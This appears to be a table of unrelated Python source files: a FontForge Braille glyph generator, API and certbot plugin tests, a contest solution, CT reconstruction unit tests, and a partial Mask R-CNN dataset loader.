content stringlengths 5 1.05M |
|---|
__license__ = """
This file is part of Gnu FreeFont.
Gnu FreeFont is free software: you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free Software
Foundation, either version 3 of the License, or (at your option) any later
version.
Gnu FreeFont is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with
Gnu FreeFont. If not, see <http://www.gnu.org/licenses/>.
"""
__author__ = "Stevan White"
__email__ = "stevan.white@googlemail.com"
__copyright__ = "Copyright 2010, Stevan White"
__date__ = "$Date: 2010/09/18 08:50:42 $"
__version__ = "$Revision: 1.6 $"
import fontforge
import psMat
from sys import stdout
__doc__ = """
Replaces the Braille Pattern range in a font. There must already be
characters defined there.
Two auxiliar glyphs, in variables glyphOff and glyphOn below, represent the
off and on state of the Braille dots, respectively.
One also needs to set the font file path, the width between columns of dots,
and the width between rows of dots, as well as the width of the glyphs.
The first 64 Braille Patterns consist of two columns of four dots,
the bottom two of which are all zero. The other 6 dots are represented
by the bit patterns of the octal digits of the offset from the range start.
The remaining three sets of 64 patterns repeat the first set, with
the bottom two dots being the bit pattern for the numbers 1 to 4 in binary.
"""
font = fontforge.open( '../../sfd/FreeMono.sfd' )
glyphOff = 'braille_off'
glyphOn = 'braille_on'
colwidth = 220
rowheight = -220
glyphwidth = 600
def drawdot( g, col, row, on ):
move = psMat.translate( col * colwidth, row * rowheight )
if on:
g.addReference( glyphOn, move )
else:
g.addReference( glyphOff, move )
def createAndName( font, off ):
return font.createChar( 0x2800 + off, 'braille%0.2X' % off )
def drawtopsix( g, off ):
print 'created', 'braille%0.2X' % off
g.clear()
g.right_side_bearing = glyphwidth
for col in range ( 0, 2 ):
for row in range ( 0, 3 ):
print 'shift', ( 3 * col + row )
state = ( 1 << ( 3 * col + row ) ) & off
drawdot( g, col, row, state )
# Contrary to the FontForge docs, font.createChar does *not* create a
# glyph if one doesn't exist, but *does* re-name it if it already exists.
for off in range ( 0, 0x0100 ):
g = createAndName( font, off )
drawtopsix( g, off )
drawdot( g, 0, 3, ( off / 0x40 ) % 2 != 0 )
drawdot( g, 1, 3, off / 0x80 != 0 )
font.save()
|
import json
import time
from itertools import product
import pytest
from fastapi.testclient import TestClient
import networkx as nx
from nereid.main import app
from nereid.core.config import API_LATEST
from nereid.src.network.utils import clean_graph_dict
from nereid.tests.utils import get_payload, generate_n_random_valid_watershed_graphs
@pytest.fixture(scope="module")
def client():
with TestClient(app) as client:
yield client
@pytest.fixture(scope="module")
def named_validation_responses(client):
route = API_LATEST + "/network/validate"
responses = {}
slow_valid = json.dumps(clean_graph_dict(nx.gnr_graph(15000, p=0.05, seed=42)))
slow_invalid = json.dumps(clean_graph_dict(nx.gnc_graph(15000, seed=42)))
init_post_requests = [
("valid_graph_response_fast", get_payload("network_validate_is_valid.json")),
(
"invalid_graph_response_fast",
get_payload("network_validate_is_invalid_cycle.json"),
),
("valid_graph_response_slow", slow_valid),
("invalid_graph_response_slow", slow_invalid),
]
for name, payload in init_post_requests:
response = client.post(route, data=payload)
responses[name] = response
yield responses
@pytest.fixture(scope="module")
def named_subgraph_responses(client):
route = API_LATEST + "/network/subgraph"
responses = {}
slow_graph = clean_graph_dict(nx.gnr_graph(200, p=0.05, seed=42))
nodes = [{"id": "3"}, {"id": "29"}, {"id": "18"}]
init_post_requests = [
# name, file or object, is-fast
("subgraph_response_fast", get_payload("network_subgraph_request.json"), True),
(
"subgraph_response_slow",
json.dumps(dict(graph=slow_graph, nodes=nodes)),
False,
),
]
for name, payload, isfast in init_post_requests:
response = client.post(route, data=payload)
responses[name] = response
result_route = response.json()["result_route"]
if isfast:
# trigger the svg render here so it's ready to get later.
client.get(result_route + "/img?media_type=svg")
time.sleep(0.5)
yield responses
@pytest.fixture(scope="module")
def solution_sequence_response(client):
min_branch_size = [2, 6, 10, 50]
n_graphs = [1, 3, 5, 10]
min_max = [(10, 11), (20, 40)]
responses = {}
for bs, ngraph, minmax in product(min_branch_size, n_graphs, min_max):
g = generate_n_random_valid_watershed_graphs(ngraph, *minmax)
payload = json.dumps(clean_graph_dict(g))
route = API_LATEST + "/network/solution_sequence"
response = client.post(route + f"?min_branch_size={bs}", data=payload)
responses[(bs, ngraph, minmax)] = response
if all([minmax == (10, 11), ngraph == 3, bs == 6]):
result_route = response.json()["result_route"]
client.get(result_route + "/img?media_type=svg")
time.sleep(0.5)
yield responses
@pytest.fixture(scope="module")
def land_surface_loading_responses(client, land_surface_loading_response_dicts):
details = ["true", "false"]
responses = {}
for detail_tf, ((nrows, nnodes), ls_request) in product(
details, land_surface_loading_response_dicts.items()
):
payload = json.dumps(ls_request)
route = API_LATEST + "/land_surface/loading" + f"?details={detail_tf}"
response = client.post(route, data=payload)
responses[(detail_tf, nrows, nnodes)] = response
yield responses
@pytest.fixture(scope="module")
def treatment_facility_responses(client, valid_treatment_facility_dicts):
responses = {}
for name, dct in valid_treatment_facility_dicts.items():
payload = json.dumps({"treatment_facilities": [dct]})
route = API_LATEST + "/treatment_facility/validate"
response = client.post(route, data=payload)
responses[name] = response
yield responses
|
"""Tests for certbot_dns_dnsimple.dns_dnsimple."""
import unittest
import mock
from requests.exceptions import HTTPError
from certbot.compat import os
from certbot.plugins import dns_test_common
from certbot.plugins import dns_test_common_lexicon
from certbot.tests import util as test_util
API_ID = 12345
API_TOKEN = 'foo'
class AuthenticatorTest(test_util.TempDirTestCase,
dns_test_common_lexicon.BaseLexiconAuthenticatorTest):
def setUp(self):
super(AuthenticatorTest, self).setUp()
from certbot_dns_verifier.dns_verifier import Authenticator
path = os.path.join(self.tempdir, 'file.ini')
dns_test_common.write({"verifier_api_id": API_ID, "verifier_api_token": API_TOKEN}, path)
self.config = mock.MagicMock(verifier_credentials=path,
verifier_propagation_seconds=0) # don't wait during tests
self.auth = Authenticator(self.config, "verifier")
self.mock_client = mock.MagicMock()
# _get_dnsimple_client | pylint: disable=protected-access
self.auth._get_dns_client = mock.MagicMock(return_value=self.mock_client)
class DNSimpleLexiconClientTest(unittest.TestCase, dns_test_common_lexicon.BaseLexiconClientTest):
LOGIN_ERROR = HTTPError('401 Client Error: Unauthorized for url: ...')
def setUp(self):
from certbot_dns_verifier.dns_verifier import _DNSLexiconClient
self.client = _DNSLexiconClient(API_ID, API_TOKEN, 0)
self.provider_mock = mock.MagicMock()
self.client.provider = self.provider_mock
if __name__ == "__main__":
unittest.main() # pragma: no cover |
T = int(input())
for x in range(1, T + 1):
N, P = map(int, input().split())
S = map(int, input().split())
S = sorted(S, reverse = True)
y = hours = sum(S[0] - s for s in S[:P])
for i in range(1, N - P + 1):
hours -= (S[i - 1] - S[i]) * (P - 1)
hours += S[i] - S[P + i - 1]
if hours < y:
y = hours
print("Case #{}: {}".format(x, y), flush = True)
|
# -*- coding: utf-8 -*-
# This work is part of the Core Imaging Library (CIL) developed by CCPi
# (Collaborative Computational Project in Tomographic Imaging), with
# substantial contributions by UKRI-STFC and University of Manchester.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from cil.framework import AcquisitionGeometry
from cil.utilities.dataexample import SIMULATED_PARALLEL_BEAM_DATA, SIMULATED_CONE_BEAM_DATA, SIMULATED_SPHERE_VOLUME
import unittest
from scipy.fft import fft, ifft
import numpy as np
from utils import has_tigre, has_gpu_tigre, has_ipp
import gc
if has_tigre:
from cil.plugins.tigre import ProjectionOperator as ProjectionOperator
from cil.plugins.tigre import FBP as FBP_tigre
from tigre.utilities.filtering import ramp_flat, filter
from cil.recon.Reconstructor import Reconstructor # checks on baseclass
from cil.recon.FBP import GenericFilteredBackProjection # checks on baseclass
from cil.recon import FDK, FBP
has_tigre_gpu = has_gpu_tigre()
if not has_tigre_gpu:
print("Unable to run TIGRE tests")
class Test_Reconstructor(unittest.TestCase):
def setUp(self):
#%% Setup Geometry
voxel_num_xy = 255
voxel_num_z = 15
mag = 2
src_to_obj = 50
src_to_det = src_to_obj * mag
pix_size = 0.2
det_pix_x = voxel_num_xy
det_pix_y = voxel_num_z
num_projections = 1000
angles = np.linspace(0, 360, num=num_projections, endpoint=False)
self.ag = AcquisitionGeometry.create_Cone2D([0,-src_to_obj],[0,src_to_det-src_to_obj])\
.set_angles(angles)\
.set_panel(det_pix_x, pix_size)\
.set_labels(['angle','horizontal'])
self.ig = self.ag.get_ImageGeometry()
self.ag3D = AcquisitionGeometry.create_Cone3D([0,-src_to_obj,0],[0,src_to_det-src_to_obj,0])\
.set_angles(angles)\
.set_panel((det_pix_x,det_pix_y), (pix_size,pix_size))\
.set_labels(['angle','vertical','horizontal'])
self.ig3D = self.ag3D.get_ImageGeometry()
self.ad3D = self.ag3D.allocate('random')
self.ig3D = self.ag3D.get_ImageGeometry()
@unittest.skipUnless(has_tigre, "TIGRE not installed")
def test_defaults(self):
reconstructor = Reconstructor(self.ad3D)
self.assertEqual(id(reconstructor.input),id(self.ad3D))
self.assertEqual(reconstructor.image_geometry,self.ig3D)
self.assertEqual(reconstructor.backend, 'tigre')
@unittest.skipUnless(has_tigre, "TIGRE not installed")
def test_set_input(self):
reconstructor = Reconstructor(self.ad3D)
self.assertEqual(id(reconstructor.input),id(self.ad3D))
ag3D_new = self.ad3D.copy()
reconstructor.set_input(ag3D_new)
self.assertEqual(id(reconstructor.input),id(ag3D_new))
ag3D_new = self.ad3D.get_slice(vertical='centre')
with self.assertRaises(ValueError):
reconstructor.set_input(ag3D_new)
with self.assertRaises(TypeError):
reconstructor = Reconstructor(self.ag3D)
@unittest.skipUnless(has_tigre, "TIGRE not installed")
def test_weak_input(self):
data = self.ad3D.copy()
reconstructor = Reconstructor(data)
self.assertEqual(id(reconstructor.input),id(data))
del data
gc.collect()
with self.assertRaises(ValueError):
reconstructor.input
reconstructor.set_input(self.ad3D)
self.assertEqual(id(reconstructor.input),id(self.ad3D))
@unittest.skipUnless(has_tigre, "TIGRE not installed")
def test_set_image_data(self):
reconstructor = Reconstructor(self.ad3D)
self.ig3D.voxel_num_z = 1
reconstructor.set_image_geometry(self.ig3D)
self.assertEqual(reconstructor.image_geometry,self.ig3D)
@unittest.skipUnless(has_tigre, "TIGRE not installed")
def test_set_backend(self):
reconstructor = Reconstructor(self.ad3D)
with self.assertRaises(ValueError):
reconstructor.set_backend('gemma')
self.ad3D.reorder('astra')
with self.assertRaises(ValueError):
reconstructor = Reconstructor(self.ad3D)
class Test_GenericFilteredBackProjection(unittest.TestCase):
def setUp(self):
#%% Setup Geometry
voxel_num_xy = 16
voxel_num_z = 4
mag = 2
src_to_obj = 50
src_to_det = src_to_obj * mag
pix_size = 0.2
det_pix_x = voxel_num_xy
det_pix_y = voxel_num_z
num_projections = 36
angles = np.linspace(0, 360, num=num_projections, endpoint=False)
self.ag = AcquisitionGeometry.create_Cone2D([0,-src_to_obj],[0,src_to_det-src_to_obj])\
.set_angles(angles)\
.set_panel(det_pix_x, pix_size)\
.set_labels(['angle','horizontal'])
self.ig = self.ag.get_ImageGeometry()
self.ag3D = AcquisitionGeometry.create_Cone3D([0,-src_to_obj,0],[0,src_to_det-src_to_obj,0])\
.set_angles(angles)\
.set_panel((det_pix_x,det_pix_y), (pix_size,pix_size))\
.set_labels(['angle','vertical','horizontal'])
self.ig3D = self.ag3D.get_ImageGeometry()
self.ad3D = self.ag3D.allocate('random')
self.ig3D = self.ag3D.get_ImageGeometry()
@unittest.skipUnless(has_tigre, "TIGRE not installed")
def check_defaults(self, reconstructor):
self.assertEqual(reconstructor.filter, 'ram-lak')
self.assertEqual(reconstructor.fft_order, 8)
self.assertFalse(reconstructor.filter_inplace)
self.assertIsNone(reconstructor._weights)
filter = reconstructor.get_filter_array()
self.assertEqual(type(filter), np.ndarray)
self.assertEqual(len(filter), 2**8)
self.assertEqual(filter[0], 0)
self.assertEqual(filter[128],1.0)
self.assertEqual(filter[1],filter[255])
self.assertEqual(reconstructor.image_geometry,self.ig3D)
@unittest.skipUnless(has_tigre and has_ipp, "TIGRE or IPP not installed")
def test_defaults(self):
reconstructor = GenericFilteredBackProjection(self.ad3D)
self.check_defaults(reconstructor)
@unittest.skipUnless(has_tigre and has_ipp, "TIGRE or IPP not installed")
def test_reset(self):
reconstructor = GenericFilteredBackProjection(self.ad3D)
reconstructor.set_fft_order(10)
arr = reconstructor.get_filter_array()
arr.fill(0)
reconstructor.set_filter(arr)
ig = self.ig3D.copy()
ig.num_voxels_x = 4
reconstructor.set_image_geometry(ig)
reconstructor.set_filter_inplace(True)
reconstructor.reset()
self.check_defaults(reconstructor)
@unittest.skipUnless(has_tigre and has_ipp, "TIGRE or IPP not installed")
def test_set_filter(self):
reconstructor = GenericFilteredBackProjection(self.ad3D)
with self.assertRaises(ValueError):
reconstructor.set_filter("gemma")
filter = reconstructor.get_filter_array()
filter_new =filter *0.5
reconstructor.set_filter(filter_new)
self.assertEqual(reconstructor.filter, 'custom')
filter = reconstructor.get_filter_array()
np.testing.assert_array_equal(filter,filter_new)
with self.assertRaises(ValueError):
reconstructor.set_filter(filter[1:-1])
@unittest.skipUnless(has_tigre and has_ipp, "TIGRE or IPP not installed")
def test_set_fft_order(self):
reconstructor = GenericFilteredBackProjection(self.ad3D)
reconstructor.set_fft_order(10)
self.assertEqual(reconstructor.fft_order, 10)
with self.assertRaises(ValueError):
reconstructor.set_fft_order(2)
@unittest.skipUnless(has_tigre and has_ipp, "TIGRE or IPP not installed")
def test_set_filter_inplace(self):
reconstructor = GenericFilteredBackProjection(self.ad3D)
reconstructor.set_filter_inplace(True)
self.assertTrue(reconstructor.filter_inplace)
with self.assertRaises(TypeError):
reconstructor.set_filter_inplace('gemma')
class Test_FDK(unittest.TestCase):
def setUp(self):
#%% Setup Geometry
voxel_num_xy = 16
voxel_num_z = 4
mag = 2
src_to_obj = 50
src_to_det = src_to_obj * mag
pix_size = 0.2
det_pix_x = voxel_num_xy
det_pix_y = voxel_num_z
num_projections = 36
angles = np.linspace(0, 360, num=num_projections, endpoint=False)
self.ag = AcquisitionGeometry.create_Cone2D([0,-src_to_obj],[0,src_to_det-src_to_obj])\
.set_angles(angles)\
.set_panel(det_pix_x, pix_size)\
.set_labels(['angle','horizontal'])
self.ig = self.ag.get_ImageGeometry()
self.ag3D = AcquisitionGeometry.create_Cone3D([0,-src_to_obj,0],[0,src_to_det-src_to_obj,0])\
.set_angles(angles)\
.set_panel((det_pix_x,det_pix_y), (pix_size,pix_size))\
.set_labels(['angle','vertical','horizontal'])
self.ig3D = self.ag3D.get_ImageGeometry()
self.ad3D = self.ag3D.allocate('random')
self.ig3D = self.ag3D.get_ImageGeometry()
@unittest.skipUnless(has_tigre and has_ipp, "TIGRE or IPP not installed")
def test_set_filter(self):
reconstructor = FDK(self.ad3D)
filter = reconstructor.get_filter_array()
filter_new =filter *0.5
reconstructor.set_filter(filter_new)
reconstructor.set_fft_order(10)
with self.assertRaises(ValueError):
reconstructor._pre_filtering(self.ad3D)
@unittest.skipUnless(has_tigre and has_ipp, "Prerequisites not met")
def test_filtering(self):
ag = AcquisitionGeometry.create_Cone3D([0,-1,0],[0,2,0])\
.set_panel([64,3],[0.1,0.1])\
.set_angles([0,90])
ad = ag.allocate('random',seed=0)
reconstructor = FDK(ad)
out1 = ad.copy()
reconstructor._pre_filtering(out1)
#by hand
filter = reconstructor.get_filter_array()
reconstructor._calculate_weights(ag)
pad0 = (len(filter)-ag.pixel_num_h)//2
pad1 = len(filter)-ag.pixel_num_h-pad0
out2 = ad.array.copy()
out2*=reconstructor._weights
for i in range(2):
proj_padded = np.zeros((ag.pixel_num_v,len(filter)))
proj_padded[:,pad0:-pad1] = out2[i]
filtered_proj=fft(proj_padded,axis=-1)
filtered_proj*=filter
filtered_proj=ifft(filtered_proj,axis=-1)
out2[i]=np.real(filtered_proj)[:,pad0:-pad1]
diff = (out1-out2).abs().max()
self.assertLess(diff, 1e-5)
@unittest.skipUnless(has_tigre and has_ipp, "TIGRE or IPP not installed")
def test_weights(self):
ag = AcquisitionGeometry.create_Cone3D([0,-1,0],[0,2,0])\
.set_panel([3,4],[0.1,0.2])\
.set_angles([0,90])
ad = ag.allocate(0)
reconstructor = FDK(ad)
reconstructor._calculate_weights(ag)
weights = reconstructor._weights
scaling = 7.5 * np.pi
weights_new = np.ones_like(weights)
det_size_x = ag.pixel_size_h*ag.pixel_num_h
det_size_y = ag.pixel_size_v*ag.pixel_num_v
ray_length_z = 3
for j in range(4):
ray_length_y = -det_size_y/2 + ag.pixel_size_v * (j+0.5)
for i in range(3):
ray_length_x = -det_size_x/2 + ag.pixel_size_h * (i+0.5)
ray_length = (ray_length_x**2+ray_length_y**2+ray_length_z**2)**0.5
weights_new[j,i] = scaling*ray_length_z/ray_length
diff = np.max(np.abs(weights - weights_new))
self.assertLess(diff, 1e-5)
class Test_FBP(unittest.TestCase):
def setUp(self):
#%% Setup Geometry
voxel_num_xy = 16
voxel_num_z = 4
pix_size = 0.2
det_pix_x = voxel_num_xy
det_pix_y = voxel_num_z
num_projections = 36
angles = np.linspace(0, 360, num=num_projections, endpoint=False)
self.ag = AcquisitionGeometry.create_Parallel2D()\
.set_angles(angles)\
.set_panel(det_pix_x, pix_size)\
.set_labels(['angle','horizontal'])
self.ig = self.ag.get_ImageGeometry()
self.ag3D = AcquisitionGeometry.create_Parallel3D()\
.set_angles(angles)\
.set_panel((det_pix_x,det_pix_y), (pix_size,pix_size))\
.set_labels(['angle','vertical','horizontal'])
self.ig3D = self.ag3D.get_ImageGeometry()
self.ad3D = self.ag3D.allocate('random')
self.ig3D = self.ag3D.get_ImageGeometry()
@unittest.skipUnless(has_tigre and has_ipp, "TIGRE or IPP not installed")
def test_set_filter(self):
reconstructor = FBP(self.ad3D)
filter = reconstructor.get_filter_array()
filter_new =filter *0.5
reconstructor.set_filter(filter_new)
reconstructor.set_fft_order(10)
with self.assertRaises(ValueError):
reconstructor._pre_filtering(self.ad3D)
@unittest.skipUnless(has_tigre and has_ipp, "TIGRE or IPP not installed")
def test_split_processing(self):
reconstructor = FBP(self.ad3D)
self.assertEqual(reconstructor.slices_per_chunk, 0)
reconstructor.set_split_processing(1)
self.assertEqual(reconstructor.slices_per_chunk, 1)
reconstructor.reset()
self.assertEqual(reconstructor.slices_per_chunk, 0)
@unittest.skipUnless(has_tigre and has_ipp, "Prerequisites not met")
def test_filtering(self):
ag = AcquisitionGeometry.create_Parallel3D()\
.set_panel([64,3],[0.1,0.1])\
.set_angles([0,90])
ad = ag.allocate('random',seed=0)
reconstructor = FBP(ad)
out1 = ad.copy()
reconstructor._pre_filtering(out1)
#by hand
filter = reconstructor.get_filter_array()
reconstructor._calculate_weights(ag)
pad0 = (len(filter)-ag.pixel_num_h)//2
pad1 = len(filter)-ag.pixel_num_h-pad0
out2 = ad.array.copy()
out2*=reconstructor._weights
for i in range(2):
proj_padded = np.zeros((ag.pixel_num_v,len(filter)))
proj_padded[:,pad0:-pad1] = out2[i]
filtered_proj=fft(proj_padded,axis=-1)
filtered_proj*=filter
filtered_proj=ifft(filtered_proj,axis=-1)
out2[i]=np.real(filtered_proj)[:,pad0:-pad1]
diff = (out1-out2).abs().max()
self.assertLess(diff, 1e-5)
@unittest.skipUnless(has_tigre and has_ipp, "TIGRE or IPP not installed")
def test_weights(self):
ag = AcquisitionGeometry.create_Parallel3D()\
.set_panel([3,4],[0.1,0.2])\
.set_angles([0,90])
ad = ag.allocate(0)
reconstructor = FBP(ad)
reconstructor._calculate_weights(ag)
weights = reconstructor._weights
scaling = (2 * np.pi/ ag.num_projections) / ( 4 * ag.pixel_size_h )
weights_new = np.ones_like(weights) * scaling
np.testing.assert_allclose(weights,weights_new)
class Test_FDK_results(unittest.TestCase):
def setUp(self):
self.acq_data = SIMULATED_CONE_BEAM_DATA.get()
self.img_data = SIMULATED_SPHERE_VOLUME.get()
self.acq_data=np.log(self.acq_data)
self.acq_data*=-1.0
self.ig = self.img_data.geometry
self.ag = self.acq_data.geometry
@unittest.skipUnless(has_tigre and has_tigre_gpu and has_ipp, "TIGRE or IPP not installed")
def test_results_3D(self):
reconstructor = FDK(self.acq_data)
reco = reconstructor.run(verbose=0)
np.testing.assert_allclose(reco.as_array(), self.img_data.as_array(),atol=1e-3)
reco2 = reco.copy()
reco2.fill(0)
reconstructor.run(out=reco2, verbose=0)
np.testing.assert_allclose(reco.as_array(), reco2.as_array(), atol=1e-8)
@unittest.skipUnless(has_tigre and has_tigre_gpu and has_ipp, "TIGRE or IPP not installed")
def test_results_2D(self):
data2D = self.acq_data.get_slice(vertical='centre')
img_data2D = self.img_data.get_slice(vertical='centre')
reconstructor = FDK(data2D)
reco = reconstructor.run(verbose=0)
np.testing.assert_allclose(reco.as_array(), img_data2D.as_array(),atol=1e-3)
reco2 = reco.copy()
reco2.fill(0)
reconstructor.run(out=reco2, verbose=0)
np.testing.assert_allclose(reco.as_array(), reco2.as_array(), atol=1e-8)
@unittest.skipUnless(has_tigre and has_tigre_gpu and has_ipp, "TIGRE or IPP not installed")
def test_results_with_tigre(self):
fbp_tigre = FBP_tigre(self.ig, self.ag)
reco_tigre = fbp_tigre(self.acq_data)
#fbp CIL with TIGRE's filter
reconstructor_cil = FDK(self.acq_data)
n = 2**reconstructor_cil.fft_order
ramp = ramp_flat(n)
filt = filter('ram_lak',ramp[0],n,1,False)
reconstructor_cil = FDK(self.acq_data)
reconstructor_cil.set_filter(filt)
reco_cil = reconstructor_cil.run(verbose=0)
#with the same filter results should be virtually identical
np.testing.assert_allclose(reco_cil.as_array(), reco_tigre.as_array(),atol=1e-8)
@unittest.skipUnless(has_tigre and has_tigre_gpu and has_ipp, "TIGRE or IPP not installed")
def test_results_inplace_filtering(self):
reconstructor = FDK(self.acq_data)
reco = reconstructor.run(verbose=0)
data_filtered= self.acq_data.copy()
reconstructor_inplace = FDK(data_filtered)
reconstructor_inplace.set_filter_inplace(True)
reconstructor_inplace.run(out=reco, verbose=0)
diff = (data_filtered - self.acq_data).abs().mean()
self.assertGreater(diff,0.8)
class Test_FBP_results(unittest.TestCase):
def setUp(self):
self.acq_data = SIMULATED_PARALLEL_BEAM_DATA.get()
self.img_data = SIMULATED_SPHERE_VOLUME.get()
self.acq_data=np.log(self.acq_data)
self.acq_data*=-1.0
self.ig = self.img_data.geometry
self.ag = self.acq_data.geometry
@unittest.skipUnless(has_tigre and has_tigre_gpu and has_ipp, "TIGRE or IPP not installed")
def test_results_3D(self):
reconstructor = FBP(self.acq_data)
reco = reconstructor.run(verbose=0)
np.testing.assert_allclose(reco.as_array(), self.img_data.as_array(),atol=1e-3)
reco2 = reco.copy()
reco2.fill(0)
reconstructor.run(out=reco2, verbose=0)
np.testing.assert_allclose(reco.as_array(), reco2.as_array(), atol=1e-8)
@unittest.skipUnless(has_tigre and has_tigre_gpu and has_ipp, "TIGRE or IPP not installed")
def test_results_3D_split(self):
reconstructor = FBP(self.acq_data)
reconstructor.set_split_processing(1)
reco = reconstructor.run(verbose=0)
np.testing.assert_allclose(reco.as_array(), self.img_data.as_array(),atol=1e-3)
reco2 = reco.copy()
reco2.fill(0)
reconstructor.run(out=reco2, verbose=0)
np.testing.assert_allclose(reco.as_array(), reco2.as_array(), atol=1e-8)
@unittest.skipUnless(has_tigre and has_tigre_gpu and has_ipp, "TIGRE or IPP not installed")
def test_results_2D(self):
data2D = self.acq_data.get_slice(vertical='centre')
img_data2D = self.img_data.get_slice(vertical='centre')
reconstructor = FBP(data2D)
reco = reconstructor.run(verbose=0)
np.testing.assert_allclose(reco.as_array(), img_data2D.as_array(),atol=1e-3)
reco2 = reco.copy()
reco2.fill(0)
reconstructor.run(out=reco2, verbose=0)
np.testing.assert_allclose(reco.as_array(), reco2.as_array(), atol=1e-8)
@unittest.skipUnless(has_tigre and has_tigre_gpu and has_ipp, "TIGRE or IPP not installed")
def test_results_with_tigre(self):
fbp_tigre = FBP_tigre(self.ig, self.ag)
reco_tigre = fbp_tigre(self.acq_data)
#fbp CIL with TIGRE's filter
reconstructor_cil = FBP(self.acq_data)
n = 2**reconstructor_cil.fft_order
ramp = ramp_flat(n)
filt = filter('ram_lak',ramp[0],n,1,False)
reconstructor_cil = FBP(self.acq_data)
reconstructor_cil.set_filter(filt)
reco_cil = reconstructor_cil.run(verbose=0)
#with the same filter results should be virtually identical
np.testing.assert_allclose(reco_cil.as_array(), reco_tigre.as_array(),atol=1e-8)
@unittest.skipUnless(has_tigre and has_tigre_gpu and has_ipp, "TIGRE or IPP not installed")
def test_results_inplace_filtering(self):
reconstructor = FBP(self.acq_data)
reco = reconstructor.run(verbose=0)
data_filtered= self.acq_data.copy()
reconstructor_inplace = FBP(data_filtered)
reconstructor_inplace.set_filter_inplace(True)
reconstructor_inplace.run(out=reco, verbose=0)
diff = (data_filtered - self.acq_data).abs().mean()
self.assertGreater(diff,0.8) |
import os
import sys
import itertools
import math
import logging
import json
import re
import random
from collections import OrderedDict
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.patches as patches
import matplotlib.lines as lines
from matplotlib.patches import Polygon
# Root directory of the project
ROOT_DIR = os.path.abspath("../../")
# Import Mask RCNN
sys.path.append(ROOT_DIR) # To find local version of the library
from mrcnn import utils
from mrcnn import visualize
from mrcnn.visualize import display_images
import mrcnn.model as modellib
from mrcnn.model import log
import skimage
import cv2
############################################################
# Configurations
############################################################
class BalloonConfig():
"""Configuration for training on the toy dataset.
Derives from the base Config class and overrides some values.
"""
# Give the configuration a recognizable name
NAME = "class"
# We use a GPU with 12GB memory, which can fit two images.
# Adjust down if you use a smaller GPU.
IMAGES_PER_GPU = 1
# Number of classes (including background)
NUM_CLASSES = 1 + 4 # Background + balloon
# Number of training steps per epoch
STEPS_PER_EPOCH = 100
# Skip detections with < 90% confidence
DETECTION_MIN_CONFIDENCE = 0.9
############################################################
# Dataset
############################################################
class BalloonDataset(utils.Dataset):
def load_balloon(self, dataset_dir, subset):
"""Load a subset of the Balloon dataset.
dataset_dir: Root directory of the dataset.
subset: Subset to load: train or val
"""
# Add classes. We have only one class to add.
self.add_class("class", 1, "1")
self.add_class("class", 2, "2")
self.add_class("class", 3, "3")
self.add_class("class", 4, "4")
# Train or validation dataset?
assert subset in ["train", "val", "test"]
dataset_dir = os.path.join(dataset_dir, subset)
# Load annotations
# VGG Image Annotator (up to version 1.6) saves each image in the form:
# { 'filename': '28503151_5b5b7ec140_b.jpg',
# 'regions': {
# '0': {
# 'region_attributes': {},
# 'shape_attributes': {
# 'all_points_x': [...],
# 'all_points_y': [...],
# 'name': 'polygon'}},
# ... more regions ...
# },
# 'size': 100202
# }
# We mostly care about the x and y coordinates of each region
# Note: In VIA 2.0, regions was changed from a dict to a list.
annotations = json.load(open(os.path.join(dataset_dir, "via_export_json0413.json")))
annotations = list(annotations.values()) # don't need the dict keys
# The VIA tool saves images in the JSON even if they don't have any
# annotations. Skip unannotated images.
annotations = [a for a in annotations if a['regions']]
# Add images
for a in annotations:
# Get the x, y coordinaets of points of the polygons that make up
# the outline of each object instance. These are stores in the
# shape_attributes (see json format above)
# The if condition is needed to support VIA versions 1.x and 2.x.
if type(a['regions']) is dict:
polygons = [r['shape_attributes'] for r in a['regions'].values()]
objects = [s['region_attributes'] for s in a['regions'].values()]
num_ids = [n['class'] for n in objects]
else:
polygons = [r['shape_attributes'] for r in a['regions']]
objects = [s['region_attributes'] for s in a['regions']]
num_ids = [n['class'] for n in objects]
#if type(a['regions']) is dict:
# polygons_x , polygons_y = [r['all_points_x'] for r in a['regions'].values()],[r['all_points_y'] for r in a['regions'].values()]
# polygons = [polygons_x , polygons_y]
#else:
# polygons_x , polygons_y = [r['all_points_x'] for r in a['regions']],[r['all_points_y'] for r in a['regions']]
# polygons = [polygons_x , polygons_y]
# load_mask() needs the image size to convert polygons to masks.
# Unfortunately, VIA doesn't include it in JSON, so we must read
# the image. This is only managable since the dataset is tiny.
image_path = os.path.join(dataset_dir, a['filename'])
image = skimage.io.imread(image_path)
height, width = image.shape[:2]
filename = a['filename']
self.add_image(
"class",
image_id=a['filename'], # use file name as a unique image id
path=image_path,
width=width, height=height,
polygons=polygons,
num_ids=num_ids, filename=filename)
def get_class_id_from_class_name(self, class_name):
class_ids=[]
for i in range(len(class_name)):
for j in range(len(self.class_info)):
if self.class_info[j]['name'] == class_name[i]:
id_name = self.class_info[j]['id']
class_ids.append(id_name)
return class_ids
def load_mask(self, image_id):
"""Generate instance masks for an image.
Returns:
masks: A bool array of shape [height, width, instance count] with
one mask per instance.
class_ids: a 1D array of class IDs of the instance masks.
"""
# If not a balloon dataset image, delegate to parent class.
image_info = self.image_info[image_id]
if image_info["source"] != "class":
return super(self.__class__, self).load_mask(image_id)
num_ids = image_info['num_ids']
# Convert polygons to a bitmap mask of shape
# [height, width, instance_count]
info = self.image_info[image_id]
filename = info['filename']
mask = np.zeros([info["height"], info["width"], len(info["polygons"])],
dtype=np.uint8)
for i, p in enumerate(info["polygons"]):
# Get indexes of pixels inside the polygon and set them to 1
rr, cc = skimage.draw.polygon(p['all_points_y'], p['all_points_x'])
mask[rr, cc, i] = 255
# change num_dis to class_ids (class -> id)
class_ids=self.get_class_id_from_class_name(num_ids)
# Return mask, and array of class IDs of each instance. Since we have
# one class ID only, we return an array of 1s
#return mask.astype(np.bool), np.ones([mask.shape[-1]], dtype=np.int32)
return mask, np.array(class_ids, dtype=np.int32), filename
############################################################
# Generate load mask file
